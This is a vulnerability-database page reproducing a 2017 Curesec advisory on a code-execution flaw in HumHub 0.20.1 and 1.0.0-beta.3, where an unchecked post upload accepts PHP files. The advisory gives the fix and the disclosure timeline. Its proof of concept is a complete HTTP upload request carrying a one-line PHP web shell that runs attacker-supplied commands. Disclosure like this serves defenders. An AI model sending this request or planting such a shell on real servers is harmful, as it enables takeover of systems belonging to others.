Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormTim CoenPACKETSTORM:141683
HistoryMar 17, 2017 - 12:00 a.m.

HumHub 0.20.1 / 1.0.0-beta.3 Shell Upload

2017-03-1700:00:00
Tim Coen
packetstormsecurity.com
38
JSON
`Security Advisory - Curesec Research Team  
  
1. Introduction  
  
Affected Product: HumHub 0.20.1 / 1.0.0-beta.3  
Fixed in: 1.0.0  
Fixed Version https://www.humhub.org/en/download/default/form?version=1.0.0  
Link: &type=zip  
Vendor Website: https://www.humhub.org/  
Vulnerability Code Execution  
Type:  
Remote Yes  
Exploitable:  
Reported to 01/10/2016  
vendor:  
Disclosed to 03/17/2017  
public:  
Release mode: Coordinated Release  
CVE: n/a  
Credits Tim Coen of Curesec GmbH  
  
2. Overview  
  
HumHub is a social media platform written in PHP. In version 0.20.1 as well as  
1.0.0-beta.3, it is vulnerable to Code Execution as some functionality allows  
the uploading of PHP files. Successfull exploitation requires specific server  
settings. A user account is required as well, but registration is open by  
default.  
  
3. Details  
  
CVSS: High 7.6 AV:N/AC:H/Au:N/C:C/I:C/A:C  
  
Most of the file uploads of HumHub check the file extension or file type before  
uploading a file. However, the file upload of the "What's on your mind?"-text  
box allows upload of arbitrary files.  
  
A htaccess file forbids the execution of PHP code in uploaded files, but some  
servers are configured to not read htaccess files. This is for example the case  
with default Apache configurations. Because of this, uploaded files should be  
checked to not have dangerous file extensions.  
  
An account is needed, but the registration is open by default.  
  
An admin does have the option to configure what files are allowed here: http://  
localhost/humhub-0.20.0/index.php?r=admin%2Fsetting%2Ffile. But by default, all  
files are allowed (although .htaccess is renamed).  
  
It should also be noted that the documentation specifically mentions that the  
upload directory needs to be protected. However, it is to be assumed that not  
all users follow this suggestion, especially as there is no warning in the  
installation process itself.  
  
Proof of Concept:  
  
POST /humhub-0.20.1/index.php?r=file%2Ffile%2Fupload&objectModel=&objectId=  
HTTP/1.1 Host: localhost Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-CSRF-Token:  
TzMwdHgxWkcafVg5EHsjKyBeQS0fUCMBeHdxPg1wDiV2cEZZN3xrDw== X-Requested-With:  
XMLHttpRequest Content-Length: 1080 Content-Type: multipart/form-data; boundary  
=---------------------------101749290911301792911842334968 Cookie: [...]  
Connection: keep-alive Pragma: no-cache Cache-Control: no-cache  
-----------------------------101749290911301792911842334968  
Content-Disposition: form-data; name="_csrf"  
TzMwdHgxWkcafVg5EHsjKyBeQS0fUCMBeHdxPg1wDiV2cEZZN3xrDw==  
-----------------------------101749290911301792911842334968  
Content-Disposition: form-data; name="message"  
-----------------------------101749290911301792911842334968  
Content-Disposition: form-data; name="notifyUserInput"  
-----------------------------101749290911301792911842334968  
Content-Disposition: form-data; name="containerGuid"  
3edb07bd-969f-4da3-a4bc-3e2f92a6474c  
-----------------------------101749290911301792911842334968  
Content-Disposition: form-data; name="containerClass" humhub\modules\user\  
models\User -----------------------------101749290911301792911842334968  
Content-Disposition: form-data; name="fileList"  
-----------------------------101749290911301792911842334968  
Content-Disposition: form-data; name="files[]"; filename="test.php"  
Content-Type: application/x-php <?php passthru($_GET['x']);  
-----------------------------101749290911301792911842334968--  
  
4. Solution  
  
To mitigate this issue please upgrade at least to version 1.0.0:  
  
https://www.humhub.org/en/download/default/form?version=1.0.0&type=zip  
  
Please note that a newer version might already be available.  
  
5. Report Timeline  
  
01/10/2016 Informed Vendor about Issue  
01/12/2016 Vendor confirms issue  
02/10/2016 Vendor requests more time  
03/27/2016 Vendor releases fix  
03/17/2017 Disclosed to public  
  
  
Blog Reference:  
https://www.curesec.com/blog/article/blog/HumHub-0201--100-beta3-Code-Execution-196.html  
  
--  
blog: https://www.curesec.com/blog  
Atom Feed: https://www.curesec.com/blog/feed.xml  
RSS Feed: https://www.curesec.com/blog/rss.xml  
tweet: https://twitter.com/curesec  
  
Curesec GmbH  
Curesec Research Team  
Josef-Orlopp-StraAe 54  
10365 Berlin, Germany  
  
  
`
JSON